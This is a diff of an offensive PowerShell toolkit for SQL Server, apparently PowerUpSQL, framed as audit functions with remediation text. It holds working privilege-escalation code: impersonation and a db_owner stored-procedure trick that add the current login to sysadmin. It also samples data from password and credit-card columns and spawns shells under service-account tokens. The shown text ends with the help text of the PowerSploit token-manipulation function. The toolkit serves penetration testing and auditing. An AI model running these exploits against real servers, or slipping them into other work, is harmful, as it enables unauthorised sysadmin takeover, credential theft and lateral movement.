| ForEach-Object -Process { - $CurrentPrincpalList += $_.RolePrincipalName - } - # -------------------------------------------- + # --------------------------------------------------------------- # Set function meta data for report output - # -------------------------------------------- + # --------------------------------------------------------------- if($Exploit) { $TestMode = 'Exploit' @@ -11810,135 +23086,151 @@ Function Invoke-SQLAuditRoleDbOwner { $TestMode = 'Audit' } - $Vulnerability = 'DATABASE ROLE - DB_OWNER' - $Description = 'The login has the DB_OWER role in one or more databases. This may allow the login to escalate privileges to sysadmin if the affected databases are trusted and owned by a sysadmin.' - $Remediation = "If the permission is not required remove it. Permissions are granted with a command like: EXEC sp_addrolemember 'DB_OWNER', 'MyDbUser', and can be removed with a command like: EXEC sp_droprolemember 'DB_OWNER', 'MyDbUser'" - $Severity = 'Medium' + $Vulnerability = 'Excessive Privilege - Impersonate Login' + $Description = 'The current SQL Server login can impersonate other logins. This may allow an authenticated login to gain additional privileges.' + $Remediation = 'Consider using an alterative to impersonation such as signed stored procedures. Impersonation is enabled using a command like: GRANT IMPERSONATE ON Login::sa to [user]. It can be removed using a command like: REVOKE IMPERSONATE ON Login::sa to [user]' + $Severity = 'High' $IsVulnerable = 'No' $IsExploitable = 'No' $Exploited = 'No' - if($Username) - { - $ExploitCmd = "Invoke-SQLAuditRoleDbOwner -Instance $Instance -Username $Username -Password $Password -Exploit" - } - else - { - $ExploitCmd = "Invoke-SQLAuditRoleDbOwner -Instance $Instance -Exploit" - } + $ExploitCmd = "Invoke-SQLAuditPrivImpersonateLogin -Instance $Instance -Exploit" $Details = '' - $Dependancies = 'Affected databases must be owned by a sysadmin and be trusted.' - $Reference = 'https://msdn.microsoft.com/en-us/library/ms189121.aspx,https://msdn.microsoft.com/en-us/library/ms187861.aspx' + $Reference = 'https://msdn.microsoft.com/en-us/library/ms181362.aspx' $Author = 'Scott Sutherland (@_nullbind), NetSPI 2016' - # ----------------------------------------------------------------- - # Check for the Vulnerability - # Note: Typically a missing patch or weak configuration - # ----------------------------------------------------------------- + # --------------------------------------------------------------- + # Check for Vulnerability + # --------------------------------------------------------------- - # Iterate through each current login and their associated roles - $CurrentPrincpalList| - ForEach-Object -Process { - # Check if login or role has the DB_OWNER roles in any databases - $DBOWNER = Get-SQLDatabaseRoleMember -Instance $Instance -Username $Username -Password $Password -Credential $Credential -RolePrincipalName DB_OWNER -PrincipalName $_ -SuppressVerbose + # Get list of SQL Server logins that can be impersonated by the current login + $ImpersonationList = Get-SQLServerPriv -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { + $_.PermissionName -like 'IMPERSONATE' + } - # ----------------------------------------------------------------- - # Check for exploit dependancies - # Note: Typically secondary configs required for dba/os execution - # ----------------------------------------------------------------- + # Check if any SQL Server logins can be impersonated + if($ImpersonationList) + { + # Status user + Write-Verbose -Message "$Instance : - Logins can be impersonated." + $IsVulnerable = 'Yes' - # Check for db ownerships - if($DBOWNER) - { - # Add an entry for each database where the user has the db_owner role - $DBOWNER| - ForEach-Object -Process { - $DatabaseTarget = $_.DatabaseName - $PrincipalTarget = $_.PrincipalName + # --------------------------------------------------------------- + # Check if Vulnerability is Exploitable + # --------------------------------------------------------------- - Write-Verbose -Message "$Instance : - $PrincipalTarget has the DB_OWNER role in the $DatabaseTarget database." - $IsVulnerable = 'Yes' + # Iterate through each affected login and check if they are a sysadmin + $ImpersonationList | + ForEach-Object -Process { + # Grab grantee and impersonable login + $ImpersonatedLogin = $_.ObjectName + $GranteeName = $_.GranteeName - # Check if associated database is trusted and the owner is a sysadmin - $Depends = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseTarget -SuppressVerbose | Where-Object -FilterScript { - $_.is_trustworthy_on -eq 1 -and $_.OwnerIsSysadmin -eq 1 - } + # Check if impersonable login is a sysadmin + $ImpLoginSysadminStatus = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query "SELECT IS_SRVROLEMEMBER('sysadmin','$ImpersonatedLogin') as Status" -SuppressVerbose | Select-Object -Property Status -ExpandProperty Status + If($ImpLoginSysadminStatus -eq 1) + { + #Status user + Write-Verbose -Message "$Instance : - $GranteeName can impersonate the $ImpersonatedLogin sysadmin login." + $IsExploitable = 'Yes' + $Details = "$GranteeName can impersonate the $ImpersonatedLogin SYSADMIN login. This test was ran with the $CurrentLogin login." - if($Depends) + # --------------------------------------------------------------- + # Exploit Vulnerability + # --------------------------------------------------------------- + if($Exploit) { - $IsExploitable = 'Yes' - Write-Verbose -Message "$Instance : - The $DatabaseTarget database is set as trustworthy and is owned by a sysadmin. This is exploitable." + # Status user + Write-Verbose -Message "$Instance : - EXPLOITING: Starting exploit process..." - # ----------------------------------------------------------------- - # Exploit Vulnerability - # Note: Add the current user to sysadmin fixed server role - # ----------------------------------------------------------------- - if($Exploit) + # Check if user is already a sysadmin + $SysadminPreCheck = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query "SELECT IS_SRVROLEMEMBER('sysadmin','$CurrentLogin') as Status" -SuppressVerbose | Select-Object -Property Status -ExpandProperty Status + if($SysadminPreCheck -ne 1) { - # Check if user is already a sysadmin - $SysadminPreCheck = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query "SELECT IS_SRVROLEMEMBER('sysadmin','$CurrentLogin') as Status" -SuppressVerbose | Select-Object -Property Status -ExpandProperty Status - if($SysadminPreCheck -eq 0) - { - # Status user - Write-Verbose -Message "$Instance : - EXPLOITING: Verified that the current user ($CurrentLogin) is NOT a sysadmin." - Write-Verbose -Message "$Instance : - EXPLOITING: Attempting to add the current user ($CurrentLogin) to the sysadmin role by using DB_OWNER permissions..." - - $SpQuery = "CREATE PROCEDURE sp_elevate_me - WITH EXECUTE AS OWNER - AS - begin - EXEC sp_addsrvrolemember '$CurrentLogin','sysadmin' - end;" + # Status user + Write-Verbose -Message "$Instance : - EXPLOITING: Verified that the current user ($CurrentLogin) is NOT a sysadmin." + Write-Verbose -Message "$Instance : - EXPLOITING: Attempting to add the current user ($CurrentLogin) to the sysadmin role by impersonating $ImpersonatedLogin..." - # Add sp_elevate_me stored procedure - $null = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query "$SpQuery" -SuppressVerbose -Database $DatabaseTarget + # Attempt to add the current login to sysadmins fixed server role + $null = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query "EXECUTE AS LOGIN = '$ImpersonatedLogin';EXEC sp_addsrvrolemember '$CurrentLogin','sysadmin';Revert" -SuppressVerbose - # Run sp_elevate_me stored procedure - $null = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query 'sp_elevate_me' -SuppressVerbose -Database $DatabaseTarget + # Verify the login was added successfully + $SysadminPostCheck = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query "SELECT IS_SRVROLEMEMBER('sysadmin','$CurrentLogin') as Status" -SuppressVerbose | Select-Object -Property Status -ExpandProperty Status + if($SysadminPostCheck -eq 1) + { + Write-Verbose -Message "$Instance : - EXPLOITING: It was possible to make the current user ($CurrentLogin) a sysadmin!" + $Exploited = 'Yes' + } + else + { + Write-Verbose -Message "$Instance : - EXPLOITING: It was not possible to make the current user ($CurrentLogin) a sysadmin." + } + } + else + { + # Status user + Write-Verbose -Message "$Instance : - EXPLOITING: The current login ($CurrentLogin) is already a sysadmin. No privilege escalation needed." + $Exploited = 'No' + } + } + # --------------------------------------------------------------- + # Exploit Nested Impersonation Vulnerability + # --------------------------------------------------------------- + if($Nested) + { + # Status user + Write-Verbose -Message "$Instance : - EXPLOITING: Starting Nested Impersonation exploit process (under assumption to levels of nesting and 1st first can impersonate sa)..." - # Remove sp_elevate_me stored procedure - $null = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query 'DROP PROC sp_elevate_me' -SuppressVerbose -Database $DatabaseTarget + # Check if user is already a sysadmin + $SysadminPreCheck = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query "SELECT IS_SRVROLEMEMBER('sysadmin','$CurrentLogin') as Status" -SuppressVerbose | Select-Object -Property Status -ExpandProperty Status + if($SysadminPreCheck -ne 1) + { + # Status user + Write-Verbose -Message "$Instance : - EXPLOITING: Verified that the current user ($CurrentLogin) is NOT a sysadmin." + Write-Verbose -Message "$Instance : - EXPLOITING: Attempting to add the current user ($CurrentLogin) to the sysadmin role..." - # Verify the login was added successfully - $SysadminPostCheck = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query "SELECT IS_SRVROLEMEMBER('sysadmin','$CurrentLogin') as Status" -SuppressVerbose | Select-Object -Property Status -ExpandProperty Status - if($SysadminPostCheck -eq 1) - { - Write-Verbose -Message "$Instance : - EXPLOITING: It was possible to make the current user ($CurrentLogin) a sysadmin!" - $Exploited = 'Yes' - } - else - { + # Attempt to add the current login to sysadmins fixed server role + $null = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query "EXECUTE AS LOGIN = '$ImpersonatedLogin';EXECUTE AS LOGIN = 'sa';EXEC sp_addsrvrolemember '$CurrentLogin','sysadmin'" - } + # Verify the login was added successfully + $SysadminPostCheck = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query "SELECT IS_SRVROLEMEMBER('sysadmin','$CurrentLogin') as Status" -SuppressVerbose | Select-Object -Property Status -ExpandProperty Status + if($SysadminPostCheck -eq 1) + { + Write-Verbose -Message "$Instance : - EXPLOITING: It was possible to make the current user ($CurrentLogin) a sysadmin!" + $Exploited = 'Yes' } else { Write-Verbose -Message "$Instance : - EXPLOITING: It was not possible to make the current user ($CurrentLogin) a sysadmin." } - - #Add record - $Details = "$PrincipalTarget has the DB_OWNER role in the $DatabaseTarget database." - $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author) } else { - #Add record - $Details = "$PrincipalTarget has the DB_OWNER role in the $DatabaseTarget database." - $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author) + # Status user + Write-Verbose -Message "$Instance : - EXPLOITING: The current login ($CurrentLogin) is already a sysadmin. No privilege escalation needed." + $Exploited = 'No' } } - else - { - #Add record - Write-Verbose -Message "$Instance : - The $DatabaseTarget is not exploitable." - $Details = "$PrincipalTarget has the DB_OWNER role in the $DatabaseTarget database, but this was not exploitable." - $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author) - } } + else + { + # Status user + Write-Verbose -Message "$Instance : - $GranteeName can impersonate the $ImpersonatedLogin login (not a sysadmin)." + $Details = "$GranteeName can impersonate the $ImpersonatedLogin login (not a sysadmin). This test was ran with the $CurrentLogin login." + $IsExploitable = 'No' + } + + # Add record + $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author) } } + else + { + # Status user + Write-Verbose -Message "$Instance : - No logins could be impersonated." + } - # Status User - Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: DATABASE ROLE - DB_OWNER" + # Status user + Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: PERMISSION - IMPERSONATE LOGIN" } End @@ -11953,14 +23245,15 @@ Function Invoke-SQLAuditRoleDbOwner # --------------------------------------- -# Invoke-SQLAuditRoleDbDdlAdmin +# Invoke-SQLAuditSampleDataByColumn # --------------------------------------- # Author: Scott Sutherland -Function Invoke-SQLAuditRoleDbDdlAdmin +Function Invoke-SQLAuditSampleDataByColumn { <# .SYNOPSIS - Check if the current user has the db_ddladmin role in any databases. + Check if the current login can access any database columns that contain the word password. Supports column name keyword search and custom data sample size. + Note: For cleaner data sample output use the Get-SQLColumnSampleData function. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password @@ -11969,28 +23262,32 @@ Function Invoke-SQLAuditRoleDbDdlAdmin SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. + .PARAMETER NoOutput + Don't output anything. + .PARAMETER Exploit + Exploit vulnerable issues + .PARAMETER SampleSize + Number of records to sample. + .PARAMETER Keyword + Column name to search for. .PARAMETER Exploit Exploit vulnerable issues. .EXAMPLE - PS C:\> Invoke-SQLAuditRoleDbDdlAdmin -Instance SQLServer1\STANDARDDEV2014 -username myuser -password mypassword + PS C:\> Invoke-SQLAuditSampleDataByColumn -Instance SQLServer1\STANDARDDEV2014 -Keyword card -SampleSize 2 -Exploit ComputerName : SQLServer1 Instance : SQLServer1\STANDARDDEV2014 - Vulnerability : DATABASE ROLE - DB_DDLADMIN - Description : The login has the DB_DDLADMIN role in one or more databases. This may allow the login to escalate privileges to sysadmin if the affected databases are trusted - and owned by a sysadmin, or if a custom assembly can be loaded. - Remediation : If the permission is not required remove it. Permissions are granted with a command like: EXEC sp_addrolemember 'DB_DDLADMIN', 'MyDbUser', and can be removed - with a command like: EXEC sp_droprolemember 'DB_DDLADMIN', 'MyDbUser' - Severity : Medium + Vulnerability : Potentially Sensitive Columns Found + Description : Columns were found in non default databases that may contain sensitive information. + Remediation : Ensure that all passwords and senstive data are masked, hashed, or encrypted. + Severity : Informational IsVulnerable : Yes - IsExploitable : No - Exploited : No - ExploitCmd : No exploit command is available at this time, but a custom assesmbly could be used. - Details : myuser has the DB_DDLADMIN role in the testdb database. - Reference : https://technet.microsoft.com/en-us/library/ms189612(v=sql.105).aspx + IsExploitable : Yes + Exploited : Yes + ExploitCmd : Invoke-SQLAuditSampleDataByColumn -Instance SQLServer1\STANDARDDEV2014 -Exploit + Details : Data sample from [testdb].[dbo].[tracking].[card] : "4111111111111111" "4111111111111112". + Reference : https://msdn.microsoft.com/en-us/library/ms188348.aspx Author : Scott Sutherland (@_nullbind), NetSPI 2016 - .EXAMPLE - PS C:\> Get-SQLInstanceDomain | Invoke-SQLAuditRoleDbDdlAdmin -Verbose #> [CmdletBinding()] Param( @@ -12011,17 +23308,26 @@ Function Invoke-SQLAuditRoleDbDdlAdmin [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, + ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, - HelpMessage = "Don't output anything.")] - [string]$NoOutput, + HelpMessage = "Don't output anything.")] + [string]$NoOutput, + + [Parameter(Mandatory = $false, + HelpMessage = 'Exploit vulnerable issues.')] + [switch]$Exploit, + + [Parameter(Mandatory = $false, + HelpMessage = 'Number of records to sample.')] + [int]$SampleSize = 1, [Parameter(Mandatory = $false, - HelpMessage = 'Exploit vulnerable issues.')] - [switch]$Exploit + HelpMessage = ' Column name to search for.')] + [string]$Keyword = 'Password' ) Begin @@ -12045,8 +23351,17 @@ Function Invoke-SQLAuditRoleDbDdlAdmin Process { + # Parse computer name from the instance + $ComputerName = Get-ComputerNameFromInstance -Instance $Instance + + # Default connection to local default instance + if(-not $Instance) + { + $Instance = $env:COMPUTERNAME + } + # Status User - Write-Verbose -Message "$Instance : START VULNERABILITY CHECK: DATABASE ROLE - DB_DDLAMDIN" + Write-Verbose -Message "$Instance : START VULNERABILITY CHECK: SEARCH DATA BY COLUMN" # Test connection to server $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { @@ -12056,7 +23371,7 @@ Function Invoke-SQLAuditRoleDbDdlAdmin { # Status user Write-Verbose -Message "$Instance : CONNECTION FAILED" - Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: DATABASE ROLE - DB_DDLADMIN" + Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: SEARCH DATA BY COLUMN" Return } else @@ -12064,18 +23379,6 @@ Function Invoke-SQLAuditRoleDbDdlAdmin Write-Verbose -Message "$Instance : CONNECTION SUCCESS" } - # Grab server, login, and role information - $ServerInfo = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose - $ComputerName = $ServerInfo.ComputerName - $CurrentLogin = $ServerInfo.CurrentLogin - $CurrentLoginRoles = Get-SQLServerRoleMember -Instance $Instance -Username $Username -Password $Password -Credential $Credential -PrincipalName $CurrentLogin -SuppressVerbose - $CurrentPrincpalList = @() - $CurrentPrincpalList += $CurrentLogin - $CurrentPrincpalList += 'Public' - $CurrentLoginRoles | ForEach-Object -Process { - $CurrentPrincpalList += $_.RolePrincipalName - } - # -------------------------------------------- # Set function meta data for report output # -------------------------------------------- @@ -12087,660 +23390,2188 @@ Function Invoke-SQLAuditRoleDbDdlAdmin { $TestMode = 'Audit' } - $Vulnerability = 'DATABASE ROLE - DB_DDLADMIN' - $Description = 'The login has the DB_DDLADMIN role in one or more databases. This may allow the login to escalate privileges to sysadmin if the affected databases are trusted and owned by a sysadmin, or if a custom assembly can be loaded.' - $Remediation = "If the permission is not required remove it. Permissions are granted with a command like: EXEC sp_addrolemember 'DB_DDLADMIN', 'MyDbUser', and can be removed with a command like: EXEC sp_droprolemember 'DB_DDLADMIN', 'MyDbUser'" - $Severity = 'Medium' + $Vulnerability = 'Potentially Sensitive Columns Found' + $Description = 'Columns were found in non default databases that may contain sensitive information.' + $Remediation = 'Ensure that all passwords and senstive data are masked, hashed, or encrypted.' + $Severity = 'Informational' $IsVulnerable = 'No' $IsExploitable = 'No' $Exploited = 'No' - $ExploitCmd = 'No exploit command is available at this time, but a custom assesmbly could be used.' + $ExploitCmd = "Invoke-SQLAuditSampleDataByColumn -Instance $Instance -Exploit" $Details = '' - $Dependancies = 'Affected databases must be owned by a sysadmin and be trusted. Or it must be possible to load a custom assembly configured for external access.' - $Reference = 'https://technet.microsoft.com/en-us/library/ms189612(v=sql.105).aspx' + $Reference = 'https://msdn.microsoft.com/en-us/library/ms188348.aspx' $Author = 'Scott Sutherland (@_nullbind), NetSPI 2016' - # ----------------------------------------------------------------- - # Check for the Vulnerability - # Note: Typically a missing patch or weak configuration - # ----------------------------------------------------------------- + # ----------------------------------------------------------------- + # Check for the Vulnerability + # Note: Typically a missing patch or weak configuration + # ----------------------------------------------------------------- + Write-Verbose -Message "$Instance : - Searching for column names that match criteria..." + $Columns = Get-SQLColumn -Instance $Instance -Username $Username -Password $Password -Credential $Credential -ColumnNameSearch $Keyword -NoDefaults -SuppressVerbose + if($Columns) + { + $IsVulnerable = 'Yes' + } + else + { + $IsVulnerable = 'No' + } + + # ----------------------------------------------------------------- + # Check for exploit dependancies + # Note: Typically secondary configs required for dba/os execution + # ----------------------------------------------------------------- + if($IsVulnerable -eq 'Yes') + { + # List affected columns + $Columns| + ForEach-Object -Process { + $DatabaseName = $_.DatabaseName + $SchemaName = $_.SchemaName + $TableName = $_.TableName + $ColumnName = $_.ColumnName + $AffectedColumn = "[$DatabaseName].[$SchemaName].[$TableName].[$ColumnName]" + $AffectedTable = "[$DatabaseName].[$SchemaName].[$TableName]" + $Query = "USE $DatabaseName; SELECT TOP $SampleSize [$ColumnName] FROM $AffectedTable " + + Write-Verbose -Message "$Instance : - Column match: $AffectedColumn" + + # ------------------------------------------------------------------ + # Exploit Vulnerability + # Note: Add the current user to sysadmin fixed server role, get data + # ------------------------------------------------------------------ + if($IsVulnerable -eq 'Yes') + { + $TblTargetColumns | + ForEach-Object -Process { + # Add sample data + Write-Verbose -Message "$Instance : - EXPLOITING: Selecting data sample from column $AffectedColumn." + + # Query for data + $DataSample = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query $Query -SuppressVerbose | + ConvertTo-Csv -NoTypeInformation | + Select-Object -Skip 1 + if($DataSample) + { + $Details = "Data sample from $AffectedColumn : $DataSample." + } + else + { + $Details = "No data found in affected column: $AffectedColumn." + } + $IsExploitable = 'Yes' + $Exploited = 'Yes' + + # Add record + $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author) + } + } + else + { + # Add affected column list + $Details = "Affected column: $AffectedColumn." + $IsExploitable = 'Yes' + $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author) + } + } + } + else + { + Write-Verbose -Message "$Instance : - No columns were found that matched the search." + } + + # Status User + Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: SEARCH DATA BY COLUMN" + } + + End + { + # Return data + if ( -not $NoOutput) + { + Return $TblData + } + } +} + + +# --------------------------------------- +# Invoke-SQLImpersonateServiceCmd +# --------------------------------------- +# Author: Scott Sutherland (Invoke-TokenManipulation wrapper) +# Author: Joe Bialek (Invoke-TokenManipulation) +Function Invoke-SQLImpersonateServiceCmd +{ + <# + .SYNOPSIS + This function will download the Invoke-TokenManipulation function written by Joe Bialek and use it + to impersonate local SQL Server service accounts in order to gain sysadmin privileges on local + SQL Server instances. By default, the function will open a cmd.exe for all local services used + by SQL Server. However, an alternative executable can also be provided (like ssms and PowerShell). + Note1: This function requires local administrative or localsystem privileges. + Note2: Currently, this function only supports local execution, but it can be run remotely via WMI or + PowerShell remoting. + .PARAMETER Instance + SQL Server instance to connection to. If no instance is provided this script will open a seperate cmd.exe + running in the context of each SQL Server service. + .PARAMETER Exe + Executable to run. + .PARAMETER EngineOnly + Only run command in the context of SQL Server database engine service accounts. + .EXAMPLE + This will pop up a cmd.exe console for every service used by SQL Server on the local system, and + the cmd.exe will be running in the context of the associated service account. + PS C:\> Invoke-SQLImpersonateServiceCmd + .EXAMPLE + This will pop up a cmd.exe consoles running as the SQL Server service accounts associated with + the provided SQL Server instance. + PS C:\> Get-SQLInstanceLocal | Invoke-SQLImpersonateServiceCmd -Verbose + .EXAMPLE + This will pop up a cmd.exe consoles running as the SQL Server service accounts associated with + the provided SQL Server instance. + the cmd.exe will be running in the context of the associated service account. + PS C:\> Invoke-SQLImpersonateServiceCmd -Verbose -Instance SQLServer1\STANDARDDEV2014 + .EXAMPLE + This will run the provided powershell command as the SQL Server datbase engine service account associated with the + provided instance. + PS C:\> Invoke-SQLImpersonateServiceCmd -Verbose -Instance SQLServer1\STANDARDDEV2014 -EngineOnly -Exe 'PowerShell -c "notepad.exe"' + #> + [CmdletBinding()] + Param( + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server instance to connection to.')] + [string]$Instance, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Executable to run. Cmd.exe and Ssms.exe are recommended.')] + [string]$Exe = 'cmd.exe', + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Only run commands in the context of SQL Server database engine service accounts.')] + [switch]$EngineOnly + ) + + Begin { + + # Check if the current process has elevated privs + # https://msdn.microsoft.com/en-us/library/system.security.principal.windowsprincipal(v=vs.110).aspx + Write-Verbose "Verifying local adminsitrator privileges..." + $CurrentIdentity = [System.Security.Principal.WindowsIdentity]::GetCurrent() + $prp = New-Object -TypeName System.Security.Principal.WindowsPrincipal -ArgumentList ($CurrentIdentity) + $adm = [System.Security.Principal.WindowsBuiltInRole]::Administrator + $IsAdmin = $prp.IsInRole($adm) + if($IsAdmin){ + Write-Verbose "The current user has local administrator privileges." + }else{ + Write-Verbose "The current user DOES NOT have local administrator privileges. Aborting." + return + } + } + + Process { + + # Status user + Write-Host "Note: The verbose flag will give you more info if you need it." + + # Get SQL services + Write-Verbose "Gathering list of SQL Server services running locally..." + if($EngineOnly){ + $LocalSQLServices = Get-SQLServiceLocal -Instance $Instance -RunOnly | Where-Object {$_.ServicePath -like "*sqlservr.exe*"} | Sort-Object Instance + Write-Verbose "Only the database engine service accounts will be targeted." + }else{ + $LocalSQLServices = Get-SQLServiceLocal -Instance $Instance -RunOnly | Sort-Object Instance + } + + # Get running processes + Write-Verbose "Gathering list of local processes..." + $LocalProcesses = Get-WmiObject -Class win32_process | Select-Object processid,ExecutablePath + + Write-Verbose "Targeting SQL Server processes..." + + # Grab SQL Service executable inforrmation + $LocalSQLServices | + ForEach-Object { + + $s_pathname = $_.ServicePath.Split("`"")[1] + $s_displayname = $_.ServiceDisplayName + $s_serviceaccount = $_.ServiceAccount + $s_instance = $_.Instance + + # Grab process information + $LocalProcesses | + ForEach-Object { + + $p_ExecutablePath = $_.ExecutablePath + $p_processid = $_.processid + + # Run executable as service account + if($s_pathname -like "$p_ExecutablePath"){ + + Write-Host "$s_instance - Service: $s_displayname - Running command `"$Exe`" as $s_serviceaccount" + + # Setup command + $MyCmd = "/C $Exe" + + # Run command + Invoke-TokenManipulation -CreateProcess 'cmd.exe' -ProcessArgs $MyCmd -ProcessId $p_processid -ErrorAction SilentlyContinue + + # + } + } + } + } + + End { + + # Status user + Write-Host "All done." + } +} + + +#endregion + +######################################################################### +# +#region THIRD PARTY FUNCTIONS +# +######################################################################### + + +# ------------------------------------------- +# Function: Invoke-TokenManipulation +# ------------------------------------------- +# Author: Joe Bialek, Twitter: @JosephBialek +function Invoke-TokenManipulation +{ +<# +.SYNOPSIS + +This script requires Administrator privileges. It can enumerate the Logon Tokens available and use them to create new processes. This allows you to use +anothers users credentials over the network by creating a process with their logon token. This will work even with Windows 8.1 LSASS protections. +This functionality is very similar to the incognito tool (with some differences, and different use goals). + +This script can also make the PowerShell thread impersonate another users Logon Token. Unfortunately this doesn't work well, because PowerShell +creates new threads to do things, and those threads will use the Primary token of the PowerShell process (your original token) and not the token +that one thread is impersonating. Because of this, you cannot use thread impersonation to impersonate a user and then use PowerShell remoting to connect +to another server as that user (it will authenticate using the primary token of the process, which is your original logon token). + +Because of this limitation, the recommended way to use this script is to use CreateProcess to create a new PowerShell process with another users Logon +Token, and then use this process to pivot. This works because the entire process is created using the other users Logon Token, so it will use their +credentials for the authentication. + +IMPORTANT: If you are creating a process, by default this script will modify the ACL of the current users desktop to allow full control to "Everyone". +This is done so that the UI of the process is shown. If you do not need the UI, use the -NoUI flag to prevent the ACL from being modified. This ACL +is not permenant, as in, when the current logs off the ACL is cleared. It is still preferrable to not modify things unless they need to be modified though, +so I created the NoUI flag. ALSO: When creating a process, the script will request SeSecurityPrivilege so it can enumerate and modify the ACL of the desktop. +This could show up in logs depending on the level of monitoring. + + +PERMISSIONS REQUIRED: +SeSecurityPrivilege: Needed if launching a process with a UI that needs to be rendered. Using the -NoUI flag blocks this. +SeAssignPrimaryTokenPrivilege : Needed if launching a process while the script is running in Session 0. + + +Important differences from incognito: +First of all, you should probably read the incognito white paper to understand what incognito does. If you use incognito, you'll notice it differentiates +between "Impersonation" and "Delegation" tokens. This is because incognito can be used in situations where you get remote code execution against a service +which has threads impersonating multiple users. Incognito can enumerate all tokens available to the service process, and impersonate them (which might allow +you to elevate privileges). This script must be run as administrator, and because you are already an administrator, the primary use of this script is for pivoting +without dumping credentials. + +In this situation, Impersonation vs Delegation does not matter because an administrator can turn any token in to a primary token (delegation rights). What does +matter is the logon type used to create the logon token. If a user connects using Network Logon (aka type 3 logon), the computer will not have any credentials for +the user. Since the computer has no credentials associated with the token, it will not be possible to authenticate off-box with the token. All other logon types +should have credentials associated with them (such as Interactive logon, Service logon, Remote interactive logon, etc). Therefore, this script looks +for tokens which were created with desirable logon tokens (and only displays them by default). + +In a nutshell, instead of worrying about "delegation vs impersonation" tokens, you should worry about NetworkLogon (bad) vs Non-NetworkLogon (good). + + +PowerSploit Function: Invoke-TokenManipulation +Author: Joe Bialek, Twitter: @JosephBialek +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None +Version: 1.11 +(1.1 -> 1.11: PassThru of System.Diagnostics.Process object added by Rune Mariboe, https://www.linkedin.com/in/runemariboe) + +.DESCRIPTION + +Lists available logon tokens. Creates processes with other users logon tokens, and impersonates logon tokens in the current thread. + +.PARAMETER Enumerate + +Switch. Specifics to enumerate logon tokens available. By default this will only list unqiue usable tokens (not network-logon tokens). + +.PARAMETER RevToSelf + +Switch. Stops impersonating an alternate users Token. + +.PARAMETER ShowAll + +Switch. Enumerate all Logon Tokens (including non-unique tokens and NetworkLogon tokens). + +.PARAMETER ImpersonateUser + +Switch. Will impersonate an alternate users logon token in the PowerShell thread. Can specify the token to use by Username, ProcessId, or ThreadId. + This mode is not recommended because PowerShell is heavily threaded and many actions won't be done in the current thread. Use CreateProcess instead. + +.PARAMETER CreateProcess + +Specify a process to create with an alternate users logon token. Can specify the token to use by Username, ProcessId, or ThreadId. + +.PARAMETER WhoAmI + +Switch. Displays the credentials the PowerShell thread is running under. + +.PARAMETER Username + +Specify the Token to use by username. This will choose a non-NetworkLogon token belonging to the user. + +.PARAMETER ProcessId + +Specify the Token to use by ProcessId. This will use the primary token of the process specified. + +.PARAMETER Process + +Specify the token to use by process object (will use the processId under the covers). This will impersonate the primary token of the process. + +.PARAMETER ThreadId + +Specify the Token to use by ThreadId. This will use the token of the thread specified. + +.PARAMETER ProcessArgs + +Specify the arguments to start the specified process with when using the -CreateProcess mode. + +.PARAMETER NoUI + +If you are creating a process which doesn't need a UI to be rendered, use this flag. This will prevent the script from modifying the Desktop ACL's of the +current user. If this flag isn't set and -CreateProcess is used, this script will modify the ACL's of the current users desktop to allow full control +to "Everyone". + +.PARAMETER PassThru + +If you are creating a process, this will pass the 